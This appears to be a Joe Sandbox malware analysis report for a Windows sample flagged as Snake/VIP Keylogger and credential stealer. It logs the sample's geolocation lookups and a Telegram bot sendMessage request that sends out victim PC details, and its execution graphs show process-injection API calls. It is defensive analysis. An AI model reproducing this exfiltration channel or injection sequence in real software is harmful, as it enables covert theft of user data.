2024-12-31 08:15:28 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49757 | 188.114.96.3 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:30 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-12-31 08:15:30 UTC | 862 | IN | HTTP/1.1 200 OK
    Date: Tue, 31 Dec 2024 08:15:30 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 947719
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kSakzmaJOiXfehYY3Q%2Bcq7srurT8mJz7php3%2BTgFq7eOC0pu0%2BYhButksxzqdV6XBUoz8%2BnWYzdEY19rDJvoT7jZyHgAX0pvq%2BC4hSGaR9suRh%2F8OKCQ5aIcXABqdWH%2BPNW3b2N"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa8d2758a699e04-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2034&rtt_var=770&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1414043&cwnd=236&unsent_bytes=0&cid=45dc4e090994216d&ts=156&x=0"
2024-12-31 08:15:30 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49759 | 188.114.96.3 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:31 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2024-12-31 08:15:31 UTC | 862 | IN | HTTP/1.1 200 OK
    Date: Tue, 31 Dec 2024 08:15:31 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 947721
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKt1dBh%2B%2BxBzlrCugcvABIAhLk1Ota66ZCqTl8CsQLx23p8aZHMRyr9H7ryppjXk6xEeaecOp%2BSaHZ%2FmHQ0eJO%2BlKjw0L8Z6%2FENFcwwUnxHzhxauJKNnMdVqrNQ9ykUBWdj7y%2FpQ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fa8d2804a6b17ad-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1608&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1783750&cwnd=171&unsent_bytes=0&cid=d18344af85c8b892&ts=159&x=0"
2024-12-31 08:15:31 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49761 | 188.114.96.3 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:33 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-31 08:15:33 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:33 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 947722
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9x4L7xoGzfDJsXTOG7l4bp%2FX9S8My6LssnGuzbKZdoJXxr3zCn%2F4ZGEn1EenkRfyE%2B96vywbzroj6NgWIbNjthgzy9dHnQABR39Rz4Xa5MHt50eDr0bSI1BlSKD5uUA7nmR%2F6y2k"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa8d28b6d7dc32f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1479&rtt_var=559&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1949265&cwnd=139&unsent_bytes=0&cid=c2e62998a8022a44&ts=154&x=0"
2024-12-31 08:15:33 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49763 | 188.114.96.3 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-12-31 08:15:35 UTC | 858 | IN | HTTP/1.1 200 OK
Date: Tue, 31 Dec 2024 08:15:35 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 947725
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IHSOCzJoQsgBI7Rgt7TmLmZxgnDrEY2TH%2F%2F1VdLkZyz9CacT%2BQxZcljTj7UcWlNz167umrw25TLtEGqBCP7en%2BA%2Bv8kK2jEStvodcFC9DXOmdzErQ2XZpgNnNTVdRh0tpTQjlbgU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fa8d299785642c3-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1671&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1724748&cwnd=203&unsent_bytes=0&cid=0a6d9b24565c0229&ts=154&x=0"
2024-12-31 08:15:35 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49764 | 149.154.167.220 | 443 | 7692 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-31 08:15:36 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2031/12/2024%20/%2020:54:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-12-31 08:15:36 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 31 Dec 2024 08:15:36 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-31 08:15:36 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                                                                                                                Target ID:0
                                                                                                                                                Start time:03:14:57
                                                                                                                                                Start date:31/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                Imagebase:0x450000
                                                                                                                                                File size:759'808 bytes
                                                                                                                                                MD5 hash:3B2A532F5145A1E1A1D04DAF8119CAF1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1826174186.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:03:14:59
                                                                                                                                                Start date:31/12/2024
                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                Imagebase:0xce0000
                                                                                                                                                File size:759'808 bytes
                                                                                                                                                MD5 hash:3B2A532F5145A1E1A1D04DAF8119CAF1
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4143324040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4144889269.000000000319A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4144889269.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:03:15:00
                                                                                                                                                Start date:31/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1248
                                                                                                                                                Imagebase:0x940000
                                                                                                                                                File size:483'680 bytes
                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true


                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:9.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:6.2%
                                                                                                                                                  Total number of Nodes:145
                                                                                                                                                  Total number of Limit Nodes:10
execution_graph: raw node/edge dump of the execution graph (145 nodes; the graphical view is not reproduced here). API-calling nodes recovered from the dump, by code address:
• e6daa6 GetCurrentProcess, e6daf8 GetCurrentThread, e6db35 GetCurrentProcess, e6db6b GetCurrentThreadId
• e6ba00 GetModuleHandleW
• e6dca8 DuplicateHandle
• e644c4, e658f8 CreateActCtxA
• 6d52930, 6d52938 PostMessageW
• 6d507b8, 6d507c0, 6d50849 CreateProcessA
• 6d50470, 6d50478, 6d504b8 VirtualAllocEx
• 6d50530, 6d50538, 6d50580 WriteProcessMemory
• 6d50620, 6d50628, 6d50673 ReadProcessMemory
The CreateProcessA, VirtualAllocEx, WriteProcessMemory and ReadProcessMemory nodes all lie in the 06D50000 dynamic/decrypted code region listed under Memory Dump Source below, and the dump shows them reached from a common set of callers in the 6d515xx-6d523xx range.
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1c508c787b286c25617195573fc03ffbba70969f96243692c85b5a2095c7e802
                                                                                                                                                  • Instruction ID: 88a5e6bb3efa1bd4ea26b2e3ab523f9d4739b8988a7dc7ad04c9e0df660b9ae0
                                                                                                                                                  • Opcode Fuzzy Hash: 1c508c787b286c25617195573fc03ffbba70969f96243692c85b5a2095c7e802
                                                                                                                                                  • Instruction Fuzzy Hash: 16711771D052298FEB64CF66CC40BE9FBB6BF89300F11D1AAD459A7650EB705A85CF80

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 294 e6da60-e6daef GetCurrentProcess 298 e6daf1-e6daf7 294->298 299 e6daf8-e6db2c GetCurrentThread 294->299 298->299 300 e6db35-e6db69 GetCurrentProcess 299->300 301 e6db2e-e6db34 299->301 303 e6db72-e6db8a 300->303 304 e6db6b-e6db71 300->304 301->300 307 e6db93-e6dbc2 GetCurrentThreadId 303->307 304->303 308 e6dbc4-e6dbca 307->308 309 e6dbcb-e6dc2d 307->309 308->309
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E6DADE
                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00E6DB1B
                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E6DB58
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E6DBB1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1824997675.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                  • String ID: [Cx%
                                                                                                                                                  • API String ID: 2063062207-3816178591
                                                                                                                                                  • Opcode ID: 4c3ed366403a31c1e299b63a0f9d4cf13cfc93667b618eba03dc1b8c09743566
                                                                                                                                                  • Instruction ID: d802304b822bb56c28c5aa70046fbfa4c6293814f42d91485c7afea94837b448
                                                                                                                                                  • Opcode Fuzzy Hash: 4c3ed366403a31c1e299b63a0f9d4cf13cfc93667b618eba03dc1b8c09743566
                                                                                                                                                  • Instruction Fuzzy Hash: 665136B0E042498FDB14DFA9D548BAEBBF1EF88314F208459D059B7360D7749984CF65

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 315 6d507b8-6d50855 318 6d50857-6d50861 315->318 319 6d5088e-6d508ae 315->319 318->319 320 6d50863-6d50865 318->320 326 6d508e7-6d50916 319->326 327 6d508b0-6d508ba 319->327 321 6d50867-6d50871 320->321 322 6d50888-6d5088b 320->322 324 6d50875-6d50884 321->324 325 6d50873 321->325 322->319 324->324 328 6d50886 324->328 325->324 333 6d5094f-6d50a09 CreateProcessA 326->333 334 6d50918-6d50922 326->334 327->326 329 6d508bc-6d508be 327->329 328->322 331 6d508e1-6d508e4 329->331 332 6d508c0-6d508ca 329->332 331->326 335 6d508cc 332->335 336 6d508ce-6d508dd 332->336 347 6d50a12-6d50a98 333->347 348 6d50a0b-6d50a11 333->348 334->333 337 6d50924-6d50926 334->337 335->336 336->336 338 6d508df 336->338 339 6d50949-6d5094c 337->339 340 6d50928-6d50932 337->340 338->331 339->333 342 6d50934 340->342 343 6d50936-6d50945 340->343 342->343 343->343 344 6d50947 343->344 344->339 358 6d50aa8-6d50aac 347->358 359 6d50a9a-6d50a9e 347->359 348->347 361 6d50abc-6d50ac0 358->361 362 6d50aae-6d50ab2 358->362 359->358 360 6d50aa0 359->360 360->358 364 6d50ad0-6d50ad4 361->364 365 6d50ac2-6d50ac6 361->365 362->361 363 6d50ab4 362->363 363->361 367 6d50ae6-6d50aed 364->367 368 6d50ad6-6d50adc 364->368 365->364 366 6d50ac8 365->366 366->364 369 6d50b04 367->369 370 6d50aef-6d50afe 367->370 368->367 372 6d50b05 369->372 370->369 372->372
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D509F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID: [Cx%$[Cx%
                                                                                                                                                  • API String ID: 963392458-3481866629
                                                                                                                                                  • Opcode ID: 0234431e4fbdc0dd2b1b7246a6a774432577703b82b99d58f56d6cd5a2072f75
                                                                                                                                                  • Instruction ID: 06cde0d6b831bb29fb1d862032474d4ed1c8581565ebab84c56d87610dbd5344
                                                                                                                                                  • Opcode Fuzzy Hash: 0234431e4fbdc0dd2b1b7246a6a774432577703b82b99d58f56d6cd5a2072f75
                                                                                                                                                  • Instruction Fuzzy Hash: 11919D71D00219DFEF54DFA8C841BEEBBB2BF48310F0585A9E808A7644DB749985CF92

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  control_flow_graph 373 6d507c0-6d50855 375 6d50857-6d50861 373->375 376 6d5088e-6d508ae 373->376 375->376 377 6d50863-6d50865 375->377 383 6d508e7-6d50916 376->383 384 6d508b0-6d508ba 376->384 378 6d50867-6d50871 377->378 379 6d50888-6d5088b 377->379 381 6d50875-6d50884 378->381 382 6d50873 378->382 379->376 381->381 385 6d50886 381->385 382->381 390 6d5094f-6d50a09 CreateProcessA 383->390 391 6d50918-6d50922 383->391 384->383 386 6d508bc-6d508be 384->386 385->379 388 6d508e1-6d508e4 386->388 389 6d508c0-6d508ca 386->389 388->383 392 6d508cc 389->392 393 6d508ce-6d508dd 389->393 404 6d50a12-6d50a98 390->404 405 6d50a0b-6d50a11 390->405 391->390 394 6d50924-6d50926 391->394 392->393 393->393 395 6d508df 393->395 396 6d50949-6d5094c 394->396 397 6d50928-6d50932 394->397 395->388 396->390 399 6d50934 397->399 400 6d50936-6d50945 397->400 399->400 400->400 401 6d50947 400->401 401->396 415 6d50aa8-6d50aac 404->415 416 6d50a9a-6d50a9e 404->416 405->404 418 6d50abc-6d50ac0 415->418 419 6d50aae-6d50ab2 415->419 416->415 417 6d50aa0 416->417 417->415 421 6d50ad0-6d50ad4 418->421 422 6d50ac2-6d50ac6 418->422 419->418 420 6d50ab4 419->420 420->418 424 6d50ae6-6d50aed 421->424 425 6d50ad6-6d50adc 421->425 422->421 423 6d50ac8 422->423 423->421 426 6d50b04 424->426 427 6d50aef-6d50afe 424->427 425->424 429 6d50b05 426->429 427->426 429->429
                                                                                                                                                  APIs
                                                                                                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D509F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1828479869.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6d50000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateProcess
                                                                                                                                                  • String ID: [Cx%$[Cx%
                                                                                                                                                  • API String ID: 963392458-3481866629
                                                                                                                                                  • Opcode ID: 84209b81ee95c8e3575c03e4f71acff29e374ba28a9622caebd235653ab61daf
                                                                                                                                                  • Instruction ID: 4063613f196fc3f6e604ec69d2647d6896191ef0918d6202660517fb6ed5eae3
                                                                                                                                                  • Opcode Fuzzy Hash: 84209b81ee95c8e3575c03e4f71acff29e374ba28a9622caebd235653ab61daf
                                                                                                                                                  • Instruction Fuzzy Hash: 01919D71D00219DFEF54DFA8C841BEEBBB2BF48310F1585A9E808A7644DB749985CF92

                                                                                                                                                  Control-flow Graph

